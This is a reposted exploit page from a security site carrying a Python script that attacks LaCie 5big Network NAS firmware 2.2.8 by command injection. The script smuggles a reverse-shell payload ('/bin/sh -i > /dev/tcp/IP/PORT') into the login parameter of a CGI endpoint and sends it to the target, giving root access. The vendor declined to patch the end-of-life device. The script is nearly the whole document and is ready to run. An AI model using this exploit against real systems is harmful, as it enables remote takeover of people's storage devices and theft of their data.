首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LaCie 5big Network 2.2.8 - Command Injection
来源:${lastname}@tyntec.com 作者:Sablowski 发布时间:2017-12-07  
#!/usr/bin/python
 
# Exploit Title: LaCie 5big Network 2.2.8 Command Injection
# Date: 2017-12-04
# Exploit Author: Timo Sablowski
# Contact: ${lastname}@tyntec.com
# Vendor Homepage: http://www.lacie.com
# Software Link: http://www.lacie.com/files/lacie-content/download/drivers/5%20Big%20Network.zip
# Version: 2.2.8
# Tested on: Linux
# Platform: Hardware
#
# Command Injection Vulnerability (with root privileges) in LaCie's
# 5big Network appliance running firmware version 2.2.8.
# Just open a netcat listener and run this script to receive a reverse
# shell to exploit the vulnerability.
#
# This exploit has been released to Seagate in accordance to their
# responsible disclosure program and is meant to be used for testing
# and educational purposes only.
# Please do not use it against any system without prior permission.
# Use at your own risk.
#
# Timeline:
#   2017-09-13: Discovery
#   2017-10-04: Reporting to Seagate
#       asking to fix the issue until 2017-12-04
#   2017-11-07: Seagate stating to not fix the vulnerability as the
#       product has been EOL for a long time
 
 
import sys, getopt, os, urllib
 
url_addition = "/cgi-bin/public/edconfd.cgi?method=getChallenge&login="
blank_payload = "admin|#' ||`/bin/sh -i > /dev/tcp/IP/PORT 0<&1 2>&1` #\\\""
 
def help():
    print "Usage:"
    print "%s -u <baseurl> -l <listener> -p <port>" %os.path.basename(sys.argv[0])
    print ""
    print "<baseurl> identifies the target's URL, e.g. http://10.0.0.1:8080"
    print "<listener> sets the IP where the attacked system connects back to"
    print "<port> defines the listening port"
    print ""
    print "Example: attack LaCie system to connect back to a remote machine (do not forget to open a netcat session)"
    print "\t %s -u http://10.0.0.1 -l 192.168.0.1 -p 4444" %os.path.basename(sys.argv[0])
 
 
def create_payload(blank_payload, listener, port):
    print "[+] Generating payload with IP %s and port %s" %(listener, str(port))
    payload = blank_payload.replace("IP", listener).replace("PORT", str(port))
    payload = urllib.quote(payload, safe='')
    return payload
 
 
def send_payload(injected_url):
    print "[+] Sending payload, this might take a few seconds ..."
    print "[+] Check your listener"
    try:
        urllib.urlopen(injected_url)
    except:
        raise
 
 
def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:],"hu:l:p:")
    except:
        help()
        sys.exit(1)
    for opt, arg in opts:
        if opt == '-h':
            help()
            sys.exit()
        elif opt in ("-u"):
            url = arg
        elif opt in ("-l"):
            listener = arg
        elif opt in ("-p"):
            port = int(arg)
    try:
        url
        listener
        port
    except:
        help()
        sys.exit(1)
 
    payload = create_payload(blank_payload, listener, port)
    injected_url = "%s%s%s" %(url, url_addition, payload)
    send_payload(injected_url)
 
 
 
if __name__ == "__main__":
    main()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Polycom Shell HDX Series Trace
·Microsoft Windows Defender - C
·Microsoft Office Equation Edit
·Claymore's Dual Miner 10.1 Sta
·Proxifier for Mac 2.19 - Local
·Hashicorp vagrant-vmware-fusio
·Hashicorp vagrant-vmware-fusio
·Hashicorp vagrant-vmware-fusio
·Sera 1.2 - Local root Privileg
·Hashicorp vagrant-vmware-fusio
·Hashicorp vagrant-vmware-fusio
·Arq 5.9.6 - Local root Privile
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved